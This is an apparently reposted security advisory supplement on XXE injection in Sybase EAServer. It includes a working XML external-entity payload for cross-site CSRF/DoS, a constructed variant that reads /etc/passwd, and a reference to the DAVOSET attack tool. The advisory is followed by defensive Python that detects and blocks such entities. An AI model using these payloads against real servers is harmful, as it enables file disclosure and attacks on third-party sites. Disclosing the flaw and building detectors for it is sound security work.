Matt Posted August 12, 2013

Description: This is a supplement to the SA-20130719-0 SEC Consult advisory that notes an additional attack vector for an XXE injection vulnerability in Sybase EAServer.
Author: MustLive
Source: Sybase EAServer XXE Injection (Packet Storm)
Code:

Hello!

I'll give you additional information concerning advisory SEC Consult SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer (http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase EAServer.

Among the vulnerabilities in EAServer there is XXE Injection, and only the local file inclusion and directory listing attack vector was mentioned. But this XXE Injection vulnerability also allows conducting attacks on other sites. So I'll supplement SEC Consult's advisory and bring your attention to another attack vector.

I wrote about such attacks in my 2012 article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and my 2013 article "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html).

As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and when using multiple web sites it's possible to conduct DDoS attacks). And last month I released a tool for conducting such attacks: in DAVOSET v.1.1.2 I added support for XML requests for XXE vulnerabilities.

XXE (WASC-43):

For the attack, the following XML data needs to be sent in a POST request.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://site/page">
]>
<lol><dt><stringValue>&xxe;</stringValue><booleanValue>0</booleanValue></dt></lol>

So all servers with affected versions of Sybase EAServer can be used for attacks on other sites via XXE.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
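The distinction the post draws (an external entity pointing at another site versus one pointing at a local file) is what a defender wants to detect and block before the XML reaches a resolving parser. The following is an added example, not code from MustLive, SEC Consult or Sybase: it parses a request body with Python's stdlib expat parser, refuses to fetch any external entity, and reports which kind of target the document tried to dereference. The sample bodies are constructed from the payload shape in the post, with "http://site/page" kept as the placeholder target.

```python
import xml.parsers.expat
from urllib.parse import urlparse

# Constructed sample: the payload from the post, external entity -> remote URL.
SAMPLE_REMOTE = b'''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://site/page">
]>
<lol><dt><stringValue>&xxe;</stringValue><booleanValue>0</booleanValue></dt></lol>'''

# Constructed variant: same shape, but the local-file vector from the advisory.
SAMPLE_LOCAL = SAMPLE_REMOTE.replace(b'"http://site/page"', b'"file:///etc/passwd"')

# Constructed benign request with no DOCTYPE or entities at all.
SAMPLE_CLEAN = b'<lol><dt><stringValue>hi</stringValue><booleanValue>0</booleanValue></dt></lol>'

REMOTE_SCHEMES = {"http", "https", "ftp"}


def inspect_entities(xml_bytes):
    """Parse xml_bytes without resolving anything external.

    Returns {"targets": [...system ids...], "verdict": "remote"|"local"|"none"}.
    "remote" is the cross-site vector the post describes; "local" is the
    file-inclusion vector from the original advisory.
    """
    targets = []

    def on_external_ref(context, base, system_id, public_id):
        # expat asks us to resolve the entity; record it and return 1 so the
        # entity is treated as empty and nothing is ever fetched.
        targets.append(system_id)
        return 1

    parser = xml.parsers.expat.ParserCreate()
    # Never expand parameter entities either (blocks external DTD tricks).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)

    schemes = {urlparse(t).scheme.lower() for t in targets}
    if schemes & REMOTE_SCHEMES:
        verdict = "remote"
    elif targets:
        verdict = "local"
    else:
        verdict = "none"
    return {"targets": targets, "verdict": verdict}
```

A front-end filter or the application itself can reject any body whose verdict is not "none"; the parser configuration shown (external refs intercepted, parameter entities disabled) is also the safe way to parse the body if it must be processed at all.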